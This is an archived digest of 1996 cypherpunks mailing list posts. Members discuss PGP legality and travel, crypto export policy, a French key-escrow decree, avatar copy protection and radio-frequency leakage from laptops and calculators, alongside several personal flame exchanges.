   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Without followers, evil cannot spread.
                -- Spock, "And The Children Shall Lead", stardate 5029.5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqZY2TCdEh3oIPAVAQHCawf8CrLnuTWx2Z2N+E/I5EA2ZeE5YVi8YoUO
w4kZcb5AnrPhDIZzJBhIYyKZ3eprVlVW+wwRd7EwFksk2GgrJwEKdfBKtS7PhcCb
kY87KVbtkCYodeVIi7zplla7CQ3k2zSvcIx27GYSO1RJsj/z5Bmyq8rOkbqocvrR
6QUjyejb5IaYmYCVcDvbblialdIkU8y2L27hfukAISx9pPQ8nf/X+NDV6QmILZNY
9rJSTPGsMchqNrZ4yYbVeUWl7VfxTuuKbx4BSXS0GFR5xnETs+Z43MJDjp0ukctj
iimhecpMWd7+xdrTAZWsHGQ/kHk6vQGjSFpr7s3qpIpi+yCQCdXF2w==
=QzdT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clark E. Satter" <v-ntxces@microsoft.com>
Date: Thu, 5 Dec 1996 05:46:04 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: No Subject
Message-ID: <c=US%a=_%p=msft%l=CLT-03-MSG-961205134601Z-3930@INET-02-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks

>X48186
>NC-ITG
When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Thu, 5 Dec 1996 04:59:31 -0800 (PST)
To: Brent Cunningham <bcungham@entrust.com>
Subject: Re: Why Cryptography is harder than it looks?
In-Reply-To: <c=CA%a=_%p=NorTel_Secure_Ne%l=GRANNY-961205002900Z-1947@bwdldb.ott.bnr.ca>
Message-ID: <199612051252.HAA04550@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Brent" == Brent Cunningham <bcungham@entrust.com> writes:

Brent> Can you please either: 1) email me a copy; or 2) give me a
Brent> pointer as to where I can get a copy; of Bruce Schneier's paper
Brent> on "Why Cryptography is harder than it looks?"

http://www.counterpane.com/whycrypto.html

-- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 5 Dec 1996 05:32:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP 5.0??
In-Reply-To: <32A654A4.D8D@imaginet-us.net>
Message-ID: <FcsgyD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ares GodOfWar <ares@imaginet-us.net> writes:

> lo all
>
> i am in a terrible mess...
> can someone inform me as to the location of PGP 5.0 shareware??
> i need it asap ;]
>
> thanx

While at it, can someone please inform me as to the location of PGP 3.0?
I guess it's an old obsolete version. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 5 Dec 1996 05:31:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Fan mail from John Gilmore and his cronies
In-Reply-To: <199612050704.AAA02080@zifi.genetics.utah.edu>
Message-ID: <XgsgyD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Apparently I'm not the only one not believing that "Logos" did not
misspell both my first name and my last name just "accidentally".

>Received: (from bin@localhost) by zifi.genetics.utah.edu (8.8.3/8.6.9) id AAA02080 for dlv@bwalk.dm.com; Thu, 5 Dec 1996 00:04:58 -0700
>Date: Thu, 5 Dec 1996 00:04:58 -0700
>Message-Id: <199612050704.AAA02080@zifi.genetics.utah.edu>
>To: dlv@bwalk.dm.com
>From: nobody@zifi.genetics.utah.edu (Anonymous)
>Comments: Please report misuse of this automated remailing service to <complaints@zifi.genetics.utah.edu>
>
>You wrote:
>
>>logos <logos@c2.net> writes:
>>>      I have been unfailingly polite to you. Do you have it
>>> within your character to respond to me in kind?
>>
>>Do you think spelling my last name "Vilus" is polite?
>
>Polite, no. Accurate, and perhaps a "freudian typo"? YES.
>
>Let me guess, O proud (if irony impaired) kook:
>
>You're now an authority on on-line manners?
>
>
>

No. Logos thinks s/he is. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Thu, 5 Dec 1996 05:07:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption policy challenged
Message-ID: <199612051300.IAA04559@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.news.com/News/Item/0,4,5909,00.html?dtn.head

"The Business Software Alliance, a powerful Washington trade
organization, warned the White House that its encryption policy will
fail if the government does not turn to the industry for guidance."

blah blah blah ...

Interesting how these polite requests from the SBA, et al, are going
for such ridiculously low goals. Being able to export 56-bit symmetric
cipher products... Why in the world go for such a low number when that
is the absolute *best* that you can possibly get? And with such a
small difference between 56 and 40 bits, there isn't really any room
to haggle.

Duh.

-- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 5 Dec 1996 05:31:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Intellectual dishonesty
In-Reply-To: <v03007800aecc2f336ad0@[207.167.93.63]>
Message-ID: <c4sgyD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May <tcmay@got.net> farts:

> Though I have some suspicions that "Logos" is someone I know in Real Life,

Me too.

> P.S. I certainly hope this "Logos" nym is not who I suspect it is, as this
> will surely end our Real World friendship. A fucking bozo.

Timmy May (fart) lies.  He has no friends except lady Palm and her 5 daughters.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Thu, 5 Dec 1996 08:47:16 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: [crypto] Avatar Protection?
Message-ID: <9612051646.AA15568@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Even with a custom client, I suppose there's always a chance 
of pulling things out of RAM.

How about a slightly different question:

Is there a way to sign it such that it wouldn't work if the
signature was removed, so there would be no question 
of who created it?

I suppose this is analogous to: Is there a way to sign
plaintext such that the plaintext can't be seen without the
signature attached?  I suppose not..

Is there a way to embed the signature as part of the 
code so it can't be removed?

    Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: cypherpunks
From: deviant @ pooh-corner.com (The Deviant) @ smtp
Date: 12/05/96 04:24:15 AM
Subject: Re: [crypto] Avatar Protection?

-----BEGIN PGP SIGNED MESSAGE-----

On 4 Dec 1996, Ryan Russell/SYBASE wrote:

> A graphic-designer friend of mine and I were talking
> about VRML avatars, and custom design work, and
> could he offer a service designing them etc...
> 
> His worry is that since everyone in the same virtual
> environment as his customer would see the designer 
> avatar, wouldn't they also be able to easily rip off
> his work?  (or his customer's property, take your pick.)
> 
> I wasn't sure...it seems to me that I read something vaguely
> along these lines for a cryptography protocol of some sort..
> The problem is this:  Is there a way for a user to "view" the client's
> avatar (and in this sense, the user usually has to receive a copy 
> of the code to render the avatar and render it on the local machine)
> but not save a copy?  Assume that a client with no save feature
> is not a viable option...too easy to work around.

Well, its concievable to write your own client, and make the code such
that it only works with that client...  I know, it kindof sucks, doesn't
it?

> 
> I suppose an analogy would be: Is there a way for a person to
> see the plaintext, but not record it?  I think that question really
> answers itself - no.  How about alternatives?  If the server
> of the environment only renders "views" (say, certain angles, or
> a bitmap) of the avatar, rather than sending the description file?
> 
> Any other thoughts?
> 
>     Ryan
> 

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"First things first -- but not necessarily in that order"
                -- The Doctor, "Doctor Who"


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqZOczCdEh3oIPAVAQHEAwf+IZ4KzMjcmb8t/HTMBvp83ChZ0VLS6xa3
+OwtpvkVGnuD4AJ+ayvDS10u4oAx78OillYDPolz6Gpnv0L+KDseo0sz7Yhgvepp
HwUw4UqMDBu9BMfkITFs6IS773EIgC8JmIf8/u6xEH/tvUjl44RQlgX+YE1Ybhvq
cGo3dF60fdiYzmoYvYESrMo9ldr97bImSjUE46bd4ZrtHjVTqDB75r9Uhb38SPWD
SdEi6rdC4sX1dY9zdJHIruhIM5BBpZcHX9Vo8cOSvzZY1s7rHXVQgb34rIcUcx7T
2GJTeJsTS2boi9O0urkKW8FIZtq82AnBk5WsavRtEIw0O5pC0jhR2g==
=aWWo
-----END PGP SIGNATURE-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Thu, 5 Dec 1996 05:54:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: PGP in Russia
Message-ID: <TCPSMTP.16.12.5.9.1.8.2780269260.1406534@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi there,

it's been asked before but I don't know the current answer: Is the use
of PGP legal in Russia? And if it's not, how are the chances of a
foreigner in Russia using it anyway to get away with it?

Please reply privately as I am currently not subscribed to the list...

Thanks in advance,

Harka@nycmetro.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 5 Dec 1996 07:33:22 -0800 (PST)
To: se7en@dis.org (Evil se7en)
Subject: Re: Travelling With Laptops/PGP
In-Reply-To: <Pine.BSI.3.91.961205032955.685A-100000@kizmiaz.dis.org>
Message-ID: <199612051519.JAA01171@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


if you are afraid of taking pgp with you, here's a proposed solution: do
not take pgp with you. when you get to spain, download pgp from norway
and recompile.

taking keys should not be a problem.

igor

Evil se7en wrote:
> 
> 
> 
> Problem:
> 
> I will be spending a couple of months chilling out in Barcelona, Spain.
> I will have a local Internet account/dial-up in that city, and will use 
> it to telnet into my various US-based accounts. This is how I plan to 
> keep in touch with various people while I am gone.
> 
> Questions:
> 
> 1 - Is the importation of two laptops and it's various peripheral devices 
> by a US citizen into Spain going to be a problem? I know it is in some 
> European countries.
> 
> 2 - Will having PGP 2.6.2, with 2048-bit keys, or any key length for this 
> matter, installed on these two machines, cause a problem?
> 
> 3 - What about having SSH and ESM installed on the laptops? Will this set 
> off red flags as well?
> 
> Now, I see a work around if this is a problem, but would like advice on 
> this also:
> 
> If I generate a temporary PGP key, and distribute it prior to my departure,
> and then store it on the US-based server (not a good idea, but it is a 
> temporary key, and if it is not a problem in Spain, SSH and ESM would be in 
> use) then bouncing out of Spain via telnet into US-based computers to 
> process encryption/decryption, key management, etc, any encryption would 
> never actually take place on servers outside of the US. 
> 
> Would this be a viable workaround? Or should I just say fuck it, and just 
> disavow myself of any reason/need for PGP for the duration of my stay? If 
> this is gonna be a problem, I'll just forego anything requiring 
> encryption while I am in Spain.
> 
> I have no interest in smuggling crypto in, or defying international law 
> just to use PGP for personal use. If it's not allowed, I simply won't use 
> it. But, I MUST be able to bring my laptops into the country. That HAS to 
> happen.
> 
> My Research: I tried to find these answers myself via conventioanl 
> methods, and either there was no information available, or the embassy 
> people I spoke to weren't sure. (Go figure!) So now I ask for your 
> opinions. 
> 
> se7en
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@extol.com.my>
Date: Wed, 4 Dec 1996 01:11:21 -0800 (PST)
To: "eva@dsnt.com>
Subject: RE: The Good dr. Dobbs
Message-ID: <96Dec5.012029gmt+0800.21892@portal.extol.com.my>
MIME-Version: 1.0
Content-Type: text/plain


Sorry Dr Boz, but all I saw on the page was this :

"404 Not Found

The requested URL /whitepaper.htm was not found on this server. "



I  would like to point out that our white paper with technical details
can be found on our Web-site:    www.dsnt.com/whitepaper.htm

-- 
Dr. Eva Bozoki
Chief Scientist
DSN Technology, Inc.
(516)467-0400







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee Elder <leeelder@flash.net>
Date: Thu, 5 Dec 1996 09:10:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: I would like to get on the mailing list
Message-ID: <32A702B3.459@flash.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't know anything about this subject but I do know it's a must
because of what's happening in the country.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 5 Dec 1996 11:27:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Dimitri IS Detweiler
Message-ID: <199612051916.LAA20806@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri Vulis wrote:

| He he he what is sauce for the goose is sauce for the gander blah blah
  ^^^^^^^^
| blah intellectual dishonesty blah blah blah typical logorrhetic "cypher
| punk" can't spell his own nym politely.

There we have it! PROOF that Dimitri is a tentacle of Detweiler.
Own up Dimitri!  (sorry for the previous accusation Dale)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AJ Barrett <abarrett@checkfree.com>
Date: Thu, 5 Dec 1996 08:22:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [crypto] Avatar Protection?
Message-ID: <2.2.32.19961205161828.006f1aa8@xavier>
MIME-Version: 1.0
Content-Type: text/plain


At 09:13 PM 12/4/96 -0500, e$pam wrote:
<snip>

This sounds like a good argument for the crypto "watermark" idea that was
discussed a few times earlier on the list. I think it goes something like
this: The document/avatar/code/whatever has a crypto identifier embedded in
it that can be extracted to verify ownership. Perhaps a good analogy might
be a steganographic application.

> The problem is this:  Is there a way for a user to "view" the client's
> avatar (and in this sense, the user usually has to receive a copy
> of the code to render the avatar and render it on the local machine)
> but not save a copy?  Assume that a client with no save feature
> is not a viable option...too easy to work around.

Yep. Even the "eyes only" setting in PGP is no good if the recipient is
savvy enough to cut and paste the plaintext to the clipboard.
--
Sincerely,
AJ Barrett <abarrett@checkfree.com>
Product Analyst

CheckFree Corporation: The Way Money Moves
http://www.checkfree.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Barnes <robertb@tritro.com.au>
Date: Wed, 4 Dec 1996 17:26:23 -0800 (PST)
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Anyone considered adding crypto into Microsoft Outlook?
Message-ID: <c=AU%a=_%p=Tritronics_.Aust%l=TRI_NT5-961205012604Z-178@net.tritro.com.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have downloaded, and strongly recommend, Jon S. Whalen's Microsoft
Exchange Client PGP Command Extension.

It adds PGP functionality to Exchange Client in a very neat and clean
way.

Rob

-----BEGIN PGP SIGNATURE-----
Version: 2.63ui

iQCVAwUBMqYkarl39AMaT2JtAQHmtQP/Yu8rh5OkkMC1GVEnz4hY6xFczeDM0Y3U
7toMIDZLVnDwRXuoo9+10sUMnB289mkjoi54fuAhbkjDKYejXVIFilJoSFq+s5FZ
K0Rdcaj8qv6VkJwL63gXMdXsFlxHIyQ/oK9/3r7tBgFyzab3tcjVXUGRy/NE5sLD
osrJm4WzfVU=
=+ffh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Thu, 5 Dec 1996 08:40:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Bank Of America To Launch Internet Banking System 12/02/96
Message-ID: <9612051640.AA23802@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  	  				 
TOKYO, JAPAN, 1996 DEC 2 (NB) -- By Martyn Williams. Bank of America  
is due to offer its credit card customers the ability to perform 
basic account transactions via the Internet next year. The bank will 
be using a system currently under development by Hitachi Ltd. and Bank 
of America subsidiary Concorde Solutions, a Hitachi spokeswoman 
confirmed to Newsbytes today. 

"The new system will enable credit card transactions via the  
Internet," said Hitachi's Emi Takase. "Bank of America is aiming 
to market the system from August, 1997." 

Customers should be able to check credit card balances and account  
details, apply for credit limit increases, and many of the other 
actions that a telephone is currently used for. 

Concorde Solutions, a company 70 percent owned by Bank of America,  
will develop the application for users with Hitachi. It will run on 
top of the Japanese company's TP Broker system, an object request 
broker that was developed with Visigenic Software Inc. 

Launch customer for the system will be Concorde parent Bank of  
America, but plans are for the system to be marketed to other banks. 
"The product will be sold by both companies afterwards," said 
Takase. 

(19961202/Press contact: Emi Takase, Hitachi Ltd., +81-3-3258-2055,  
fax +81-3-3258-5480, e-mail emi@cm.head.hitachi.co.jp; Reported By 
Newsbytes News Network: http://www.newsbytes.com) 
--	 
		   C O P Y R I G H T * R E M I N D E R 	

   This article is Copyright 1996 by Newsbytes News Network.  
   All articles in the clari.* news hierarchy are Copyrighted and licensed  
to ClariNet Communications Corp. for distribution.  Except for articles 
in the biz.clarinet.sample newsgroup, only paid subscribers may access 
these articles. Any unauthorized access, reproduction or transmission 
is strictly prohibited. 
   We offer a reward to the person who first provides us with  
information that helps stop those who distribute or receive our news 
feeds without authorization. Please send reports to reward@clari.net. 
[Use info@clari.net for sales or other inquiries.] 

   Details on use of ClariNet material and other info can be found in  
the user documentation section of our web page: <http://www.clari.net>. 
You can also read ClariNet news from your Web browser. 
  	   	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Thu, 5 Dec 1996 11:52:49 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Laptops and TEMPEST
Message-ID: <3.0.1.32.19961205114746.011fbf84@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:44 AM 12/5/96 -0800, stewarts@ix.netcom.com wrote:

>Take a basic television with big rabbit-ear antennas.
>Tune to the football game on Channel 6.
>Take your AT&T Globalyst 250P (which is a gray NEC Versa with a Death Star),
>with the 16-million-color 640x480 screen in 65536-color mode, 
>and pop up a DOS command window in white-on-black.
>Type a few lines of text, then look at the TV.
>
>The sync wasn't quite right, but there were about three copies of
>my DOS window.  It may have been scrolling slowly vertically or horizontally,
>but it was relatively readable given the lack of resolution of the screen.
>A good receiver run by a Bad Guy ought to be able to set its scan rates
>correctly to pick up the screen at better resolution.
>There are obviously more variables to be explored, but other people
>who were present at the time considered the football game to be
>more important :-)

Wow!  I am amazed the FCC has not come down hard on AT&T for something that
noisy.  (I have run my system with an open case and never gotten
interference that bad.)

<paranoia>
Or maybe it is a plot to keep an eye on Matt Blaze.  ("Here...  Have this
free company laptop!")
</paranoia>

Now the truly paranoia will not only cover their heads with tinfoil, they
will cover their laptops as well.

But seriously, it does not sound good.  I know there is specialized
equiptment used by ham radio operators to locate leakage of radio
frequencies.  Maybe someone could use it to find who the worst offenders
are and how bad the problem is.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqb8n+QCP3v30CeZAQEe5gf/WWxP6BSq17o9OPUXu2bu4DNPldb42CpB
2QHFs2N3VKymiOa1wQH7E4XyeKZzsZQdt8d6fpl12t+jMS9XqMi+2uaQNQ9IeMDG
UVAc04La/MTVCeL+SkxZUfHSp618cB/QNRT9l7MpcplfCmnhODNx06i9De7MDfnc
4zSRLMZ0mXzoOl0tKunRGSGKDVn5Yh/3Lxdk2KwR3ITUrhiENowEvBaLithv5jYG
GXdUzQwoMfEZ+rHhHJuXB0TQT4KtyrsnpNLrkH2h16j2kIp9fO05+mh9Ef2UYWgo
TeIiHal3BjZ537hmF2JpUd7ShJYhooDrKOHRXAoaMhg5ny87FTtq4g==
=Las6
-----END PGP SIGNATURE-----

---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Thorel / Netpress" <jt@freenix.fr>
Date: Thu, 5 Dec 1996 03:00:36 -0800 (PST)
To: thorel@netpress.fr
Subject: Leaked Letter Reveals French Key-Escrow Scheme
Message-ID: <v0300780caecc59a53d1f@[194.51.213.140]>
MIME-Version: 1.0
Content-Type: text/plain


lambda 2.12
* * * * *

For several months French authorities have quietly begun to build the
world's first "key recovery" encryption scheme, scheduled to take effect
early in 1997. But a leaked letter sent to the official security agency,
the SCSSI, reveals that the so-called "trust" has some limitation in the
draft project.

The proposal, called a "decret d'application," is a prime ministerial
decree scheduled to be issued after the Telecommunications Reform Act of
July 27, 1996
(http://www.telecom.gouv.fr/francais/activ/telecom/lrt96.htm). In France, a
law only takes effect after the government signs it as a decree.

The decree will define the business conditions of future "trusted third
party" (TTP) systems -- in French referred to as "tiers de
confidentialite," or a "privacy third party" -- and stresses the difference
between the two basic encryption applications: digital signature and
privacy. These agents will have the role of
electronic notaries, keeping crypto keys in custody for law enforcement or
national intelligence purposes.

Lambda Bulletin has also learned that French authorities won't impose the
"key recovery" scheme as a "mandatory" one. Yet it seems clear that a
company will not be able to do business-as-usual if its encryption systems
aren't certified by TTPs.

Is this good news for individual users? It's not certain: The law says that
crypto is legal *only* if keys are kept in custody. It won't be mandatory
-- however if you get caught using PGP, it could be considered as a
criminal offense.

The letter obtained by the press is signed by Jean-Claude Jouas, president
of the computer security think tank CLUSIF, and addressed to General
Jean-Louis Desvignes, head of the SCSSI. The CLUSIF represents
security-related executives from large French companies (some of which are
state-owned, such as Bull and Thomson) and also from private consultancies.
The SCSSI decided, after intense lobbying, to meet the industry think tank
-- which highly suggests that the CLUSIF saw the close-doors draft decree.

* Point 1: The letter emphasizes the lack of resolving important questions
such as "international exchanges." The letter says: "It shall be possible
for [future TTPs] to search partners in foreign countries in order to make
these international exchanges a reality, if these partners are ready to
respect French national legislation...." The letter goes on to say:
"section 5 [of the draft decree] presents a 'franco-francais' project,"
which could undermine the basic purposes of TTPs. This national approach
could create a blow for the OECD initiatives to reach a worldwide consensus
for encryption policies (as described in previous bulletins).

Stephane Bortzmeyer, speaking for the French Internet Users Association,
says: "We'll need more than these suggestions for allowing a reasonable use
of crypto. For instance, the international exchanges case is simple: either
PGP or SSH use are legal, or people [in France] won't be able to subscribe
to CERT mailing lists." This is because CERT urges its participants to
encrypt their communications (for integrity reasons).

* Point 2: The so-called "certification" procedures. The CLUSIF says
"concerning the users' point of view, the most critical point [is] the
certification of encryption means and technologies which will be offered by
the [TTP], especially concerning the trust level the users will have to
afford. [Evaluation and certification] is the key point to establish a
trusted relationship, and we consider it as fundamental to include [this
point] in the decree".

In terms of certification, people can understand that this will protect the
user from possible illegal duplication of encryption private keys, thus
helping to prevent illegal interception of communications. If these
certification procedures are not scheduled in the draft, people could
consider it as a reason for an additional lack of trust.

* Point 3: The think tank severely notes that "there is nothing scheduled
in the draft in the case of legal disputes ... between the user and the
third party." The litigation could erupt if the TTP gives up a users'
private keys to unauthorized parties (i.e., a competitor or a curious,
wiretapping official...).

Epilogue: The SCSSI says the final decree could be published by the end of
this month. Lambda personal bet: It might be published on Friday, December
27th. (The previous crypto legislation, in 1990, was passed as law on
December 29 -- and the decrees for it were officially signed in 1992, on
December 28.)

P.S.: The whole CLUSIF letter will be published in the French version of
this bulletin (check the Web site: http://www.freenix.fr/netizen)


* * * * *
Short Notes
* * * * *

* OECD update: The OECD draft guidelines of the crypto expert group have
been revealed in Austria. Check:
ftp://ftp.netsphere.co.at/Public/OECD/oecd.doc This is the document that
was amended during the September 26-27 meeting in Paris, thus there have
been changes since then. * EPIC conference proceedings: It's a long after
the event, but you can read the English version of a report on the crypto
conference EPIC organized in Paris on Sept. 25, on the eve of the OECD
meeting.
Check the Planete Internet Web site (English translation by K. N. Cukier):
http://194.51.213.12:80/interface/SendPage.exe?ID=389
* EF-Sverige: One Lambda subscriber advises people interesting in
cyber-rights in Sweden to check EF Sverige, independent from the US-based
organization (although, as for EF France and others, the EFF has given them
the right to use the name EF-Sverige. Check their web page at:
http://connectum.skurup.se/~annami/
EF-Sveridge was founded by two journalists: Anna-Mi Wendel
<annami@connectum.skurup.se>, the chairman, and Peppe Arninge
<journalist@peppe.pp.se>, a member of the board.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jerome Thorel 			Planete Internet
Journalist, Paris		Editor / Redac chef
thorel@netpress.fr		191 av A. Briand, 94230 Cachan
Tel: 33 1 49085833 - fax-31	www.planete-internet.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Thu, 5 Dec 1996 10:26:29 -0800 (PST)
To: Alan Olsen <alan@ctrl-alt-del.com>
Subject: Re: Codebreakers on the shelves!
In-Reply-To: <3.0.1.32.19961204090346.010a4898@mail.teleport.com>
Message-ID: <32A71484.6C15@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> 
> Warning:  The book is $65.00 hardbound!  (It is also *NOT* a small book.
> It is large.  About 2000 pages by my guess.

1181 actually, not including the table of contents and preface.

Kent




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "C. Kuethe" <ckuethe@gpu.srv.ualberta.ca>
Date: Thu, 5 Dec 1996 13:03:32 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Laptops and TEMPEST
In-Reply-To: <1.5.4.32.19961205094443.003ac018@popd.ix.netcom.com>
Message-ID: <Pine.A32.3.93.961205133030.41962A-100000@gpu5.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Dec 1996 stewarts@ix.netcom.com wrote:

> don't emit enough radiation for Bad Guys to read it.  CRTs are well known
> as emitters of easily decoded signal, but people have occasionally suggested
> on this list that laptop LCD screens are much quieter.  I now have a data
> point on this one, and basically, it ain't so.
> 
> Take a basic television with big rabbit-ear antennas.
> Tune to the football game on Channel 6.
> Take your AT&T Globalyst 250P (which is a gray NEC Versa with a Death Star),
> with the 16-million-color 640x480 screen in 65536-color mode, 
> and pop up a DOS command window in white-on-black.
> Type a few lines of text, then look at the TV.

 [snip]

Here's some more about that.  I use both the Texas Instruments ti85 and
Hewlett Packard HP48 graphics calculators.  I was playing tetris on my ti85
one day and had the radio on.  every now and then this funny noise would
come out of my radio.  After a while I noticed it was sync'ed with a
keypress on my calc.  So I tried some experiments, and I found that doing 
just about anything would emit a detectable signal.  Keep in mind that I was
using a cheap radio, tuned to a 100kW radio stn and still could tune in a
calc.  I tried 

indiviual keystrokes.........yup
individual pixel changes.....yup
idling.......................yup
printing to screen...........yup
"For" loop...................yup
NOP's........................yup

and they all sound different.  My favorite was the for loop.... sounds like
a diesel engine.  Maybe that's why my calc is running so slow.  it's only
going at 1500 RPM (revolutions per minute) The hamster inside must be
getting tired. 

I guess that's why there's that crap like this that's printed in the manual
of everything electronic...

	This equipment generates and uses radio frequency energy 
	may interfere with radio and television reception.  This
	device complies with the limits for a class B computing
	device as specified in part 15 of the FCC Rules for radio
	frequency emission and SIGINT operations pursuant to the
	interests of national security and inter-departmental
	funnies and scandals.  In the unlikely event that there
	is no interference, please call your local spook-funded
	telco and the will be more than happy to remedy this 
	situation. 

I think it was "Lucky Green" whose friend saw the little TEMPEST demo.
Perhaps this friend might care to elaborate on this issue.  I almost wonder
if there is some kind of order from on high (NSA, [A-Za-z0-0]1,5) <--regexp
to include other agencies like CSIS, MI5, Mafia, etc... -- to make "leaky"
computers. So now we have to have thermite wired onto our HD's and Noise
generators on the board. :) ICK.

--
Chris Kuethe <ckuethe@gpu.srv.ualberta.ca> LPGV Electronics and Controls
http://www.ualberta.ca/~ckuethe/
RSA in 2 lines of PERL lives at http://www.dcs.ex.ac.uk/~aba/rsa/
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 5 Dec 1996 05:03:46 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Pronunciation of the "name" "logos" [Was: Re: Politeness]
In-Reply-To: <Pine.BSF.3.91.961204184017.5363G-100000@blacklodge.c2.net>
Message-ID: <199612051306.OAA01601@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



> I note that you have 
> spelt my name as 'logos'. As it is a proper noun in the 
> usage and I have spelt it with the 'L', I would ask you if 
> you consider this spelling of my name to be polite?

Why don't you change your mail address instead of whinging?  If you can't be 
bothered to use a capital 'L', why should you expect anyone else to?
